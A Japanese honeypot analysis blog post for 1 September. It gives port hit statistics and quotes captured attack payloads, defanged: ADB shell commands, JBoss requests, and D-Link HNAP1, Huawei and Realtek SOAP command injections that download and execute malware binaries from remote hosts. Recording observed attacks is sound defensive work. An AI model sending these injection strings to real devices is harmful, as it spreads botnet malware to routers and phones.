ハニーポット簡易分析(24日目:9/1)
本来であれば、8/30,8/31の分析を行うはずでしたが、こちらの手違いでデータをロストしてしまいましたorz
今回は9/1分の分析となります。
9/1 Honeytrap 3422件(データ部 0byte以上)
ポート | 件数 | 割合 | サービス |
445 | 1,813 | 52.98% | SMB |
22 | 118 | 3.45% | SSH |
3389 | 84 | 2.46% | RDP |
1433 | 77 | 2.25% | Microsoft SQL Server |
502 | 61 | 1.78% | Modbus Protocol |
52869 | 58 | 1.70% | D-Link, Realtek SDK |
8080 | 47 | 1.37% | PROXY |
5986 | 34 | 0.99% | Windows PowerShell Default psSession Port |
81 | 32 | 0.94% |
goahead |
64738 | 32 | 0.94% | Mumble VoIP server |
マルウェアダウンロード関連
宛先ポート | 対象 | パス | ペイロード |
5555 | Android Debug Bridge | CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN[.][.][.][.][.][.][.][.]Ý[.][.][.]&A[.][.]°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.] →VirusTotal |
|
CNXN[.][.][.][.][.][.][.][.][.][.][.][.]2[.][.][.]¼±§±host::[.]OPEN)[.][.][.][.][.][.][.][.][.][.][.]O/[.][.]°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.] →VirusTotal |
|||
8080 | JBOSS | GET /jbossass/jbossass.jsp | GET /jbossass/jbossass[.]jsp?ppp=wget+hxxp%3A%2F%2F49[.]123[.]1[.]37%2Fctbuzs%2Fstdpic%2F2015%2F02%2Fdevice%2Fjboss%2Fplaintext[.]txt HTTP/1[.]1 User-Agent: jexboss →VirusTotal |
D-Link DSL-2750B | GET /login.cgi | wget%20hxxp://148[.]72[.]176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ User-Agent: Hakai/2[.]0 →VirusTotal |
|
808 | D-Link 社のルータ (CVE-2015-2051) |
POST /HNAP1/ | SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148[.]72[.]176[.]78/ngynx && sh ngynx` →VirusTotal |
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mips && chmod 777 /tmp/kenjiro[.]mips/ && /tmp/kenjiro[.]mips` →VirusTotal |
|||
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://77[.]87[.]77[.]250/izuku[.]mips && chmod +x izuku[.]mips; [.]/izuku[.]mips` →VirusTotal |
|||
37215 | Huawei社のルータ | POST /ctrlt/DeviceUpgrade_1 | <NewStatusURL>$(busybox wget -g 142[.]93[.]245[.]252 -l /tmp/aa1 -r /gaybub/miori[.]mips;busybox chmod +x /tmp/aa1 ;/tmp/aa1 huawei)</NewStatusURL> →VirusTotal |
52869 | Realtek SDK miniigd SOAP | POST /picdesc.xml | <NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient> →VirusTotal |
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/rr`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /var;wget hxxp://80[.]211[.]57[.]80/miori[.]mips`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/;wget hxxp://46[.]101[.]250[.]21/8mips8[.]mips -O 8mips8`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /var; rm -rf nig; wget hxxp://185[.]10[.]68[.]127/rtbin -O nig; chmod 777 nig; [.]/nig realtek`</NewInternalClient> →VirusTotal |
|||
<NewInternalClient>`cd /tmp/; wget hxxp://76[.]74[.]170[.]223/shit[.]mips -O k`</NewInternalClient> →VirusTotal |
大きな傾向の変化は特にありませんでした。
分析する上で、手動で行なっている部分が非常に多いため、自動化で分析に時間がかけられるようにしたいと思っています。また、IDSのsuricataも導入したものの、うまく使えていないのが現状となっています。
今月は自動化とIDSのチューニングに力を入れて、頑張っていきます。